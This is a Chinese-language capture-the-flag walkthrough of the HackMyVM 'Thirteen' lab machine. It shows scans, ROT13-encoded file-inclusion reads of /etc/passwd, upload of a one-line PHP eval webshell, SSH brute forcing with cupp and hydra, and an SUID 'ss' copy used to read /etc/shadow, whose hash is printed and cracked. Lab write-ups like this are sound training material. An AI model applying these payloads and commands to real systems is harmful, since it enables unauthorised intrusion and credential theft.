Thirteen

image

靶机地址:https://hackmyvm.eu/machines/machine.php?vm=Thirteen

192.168.100.24

信息搜集

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
root@LAPTOP-O235O5EH [~] ➜  rustscan -a 192.168.100.24                                                       [12:24:32]
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
I scanned my computer so many times, it thinks we're dating.

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.100.24:21
Open 192.168.100.24:22
Open 192.168.100.24:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-20 12:24 CST
Initiating ARP Ping Scan at 12:24
Scanning 192.168.100.24 [1 port]
Completed ARP Ping Scan at 12:24, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 12:24
Completed Parallel DNS resolution of 1 host. at 12:24, 6.52s elapsed
DNS resolution of 1 IPs took 6.52s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 3, CN: 0]
Initiating SYN Stealth Scan at 12:24
Scanning 192.168.100.24 [3 ports]
Discovered open port 21/tcp on 192.168.100.24
Discovered open port 22/tcp on 192.168.100.24
Discovered open port 80/tcp on 192.168.100.24
Completed SYN Stealth Scan at 12:24, 0.02s elapsed (3 total ports)
Nmap scan report for 192.168.100.24
Host is up, received arp-response (0.00046s latency).
Scanned at 2026-01-20 12:24:46 CST for 0s

PORT   STATE SERVICE REASON
21/tcp open  ftp     syn-ack ttl 64
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:14:13:3A (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 6.71 seconds
           Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

21ftp端口80web端口

80/tcp目录扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
root@LAPTOP-O235O5EH [/opt/tools] ➜  gobuster dir -u http://192.168.100.24 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,zip,bak,js,py,sh,swp
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.100.24
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8
[+] Extensions:              zip,js,py,sh,swp,php,html,txt,bak
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 3444]
/welcome.txt          (Status: 200) [Size: 180]
/config.txt           (Status: 200) [Size: 378]
/readme.txt           (Status: 200) [Size: 83]
/logs                 (Status: 301) [Size: 315] [--> http://192.168.100.24/logs/]
/server-status        (Status: 403) [Size: 279]
Progress: 2205580 / 2205580 (100.00%)
===============================================================
Finished
===============================================================

主页的三个功能

image

可以看到值是经过root13处理过的

image

尝试读取/etc/passwd

/rgp/cnffjq

image

发现可以读取

/logs扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
root@LAPTOP-O235O5EH [/opt/tools] ➜  gobuster dir -u http://192.168.100.24/logs -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,zip,bak,js,py,sh,swp,log
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.100.24/logs
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8
[+] Extensions:              zip,js,sh,swp,log,bak,py,php,html,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/ftp_server.log       (Status: 200) [Size: 67428]
Progress: 2426138 / 2426138 (100.00%)
===============================================================
Finished
===============================================================

/logs/ftp_server.log

查看日志可以看到ftp_server.py在/opt下面

image

读取一下,获得用户名和密码

image

提权

www shell

登录ftp

1
2
3
4
5
6
7
8
9
10
root@LAPTOP-O235O5EH [/opt/tools] ➜  lftp 192.168.100.24 -u ADMIN                                            [13:41:50]
Password:
lftp ADMIN@192.168.100.24:~> ls
-rw-r--r--   1 root     root         1607 Jul 05  2025 ftp_server.py
-rw-r--r--   1 root     root           54 Jul 05  2025 rev.sh
lftp ADMIN@192.168.100.24:/> get ftp_server.py
1607 bytes transferred
lftp ADMIN@192.168.100.24:/> get rev.sh
54 bytes transferred
lftp ADMIN@192.168.100.24:/>

image

可以发现ftp_server.py的文件内容和在/opt/ftp_server.py是一样的,说明ftp是上传到/opt目录下的

那么上传一个webshell。再使用文件包含触发

1
2
3
4
5
root@LAPTOP-O235O5EH [/opt/tools] ➜  cat webshell.php                                                        [13:53:26]
<?php @eval($_POST["cmd"])?>
root@LAPTOP-O235O5EH [/opt/tools] ➜  lftp 192.168.100.24 -u ADMIN                                            [13:53:29]
Password:
lftp ADMIN@192.168.100.24:~> put webshell.php

http://192.168.100.24/?theme=/bcg/jrofuryy.cuc

cmd

蚁剑连接

image

弹个shell

image

www -> welcome

在/home/max目录下存在hint提示

image

提示我们使用cupp生成密码,还记得前面的web的welcome list存在用户名

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
root@LAPTOP-O235O5EH [~/Desktop/test] ➜  cupp -w user.txt                                                    [16:19:07]
/usr/bin/cupp:146: SyntaxWarning: invalid escape sequence '\ '
  print("      \                     # User")
/usr/bin/cupp:147: SyntaxWarning: invalid escape sequence '\ '
  print("       \   \033[1;31m,__,\033[1;m             # Passwords")
/usr/bin/cupp:148: SyntaxWarning: invalid escape sequence '\ '
  print("        \  \033[1;31m(\033[1;moo\033[1;31m)____\033[1;m         # Profiler")
/usr/bin/cupp:149: SyntaxWarning: invalid escape sequence '\ '
  print("           \033[1;31m(__)    )\ \033[1;m  ")
 ___________
   cupp.py!                 # Common
      \                     # User
       \   ,__,             # Passwords
        \  (oo)____         # Profiler
           (__)    )\
              ||--|| *      [ Muris Kurgas | j0rgan@remote-exploit.org ]
                            [ Mebus | https://github.com/Mebus/]


      *************************************************
      *                    WARNING!!!                 *
      *         Using large wordlists in some         *
      *       options bellow is NOT recommended!      *
      *************************************************

> Do you want to concatenate all words from wordlist? Y/[N]:
> Do you want to add special chars at the end of words? Y/[N]:
> Do you want to add some random numbers at the end of words? Y/[N]:
> Leet mode? (i.e. leet = 1337) Y/[N]:

[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to user.txt.cupp.txt, counting 313 words.
[+] Now load your pistolero with user.txt.cupp.txt and shoot! Good luck!

爆破welcome用户

1
hydra -l welcome -P user.txt.cupp.txt 192.168.100.24 ssh -t 4 -vV

image

welcome -> root

1
find / -perm -4000 -type f 2>/dev/null

有个/usr/local/bin/supersuid

运行之后发现和ss是一模一样的

image

验证一下image

一模一样

ss在gtfobins有现成的提权方案

https://gtfobins.github.io/gtfobins/ss/

1
supersuid -a -F /etc/shadow

读取/etc/shadow去爆破密码

1
2
3
root@LAPTOP-O235O5EH [~/Desktop/test] ➜  cat hash.txt                                                        [16:33:59]
$6$Cax26XI4SpAAItdE$7iVSsRoQT/o0b3.V9jMiljdau506ePGmZLkIl5JH9COngDqdXJkGnizRIhaLJu/JbwWZ.7XyF/MwzuDusZJcg1
root@LAPTOP-O235O5EH [~/Desktop/test] ➜  hashcat -m 1800 -a 0 hash.txt /usr/share/wordlists/rockyou.txt --force -D 2 -w 3

image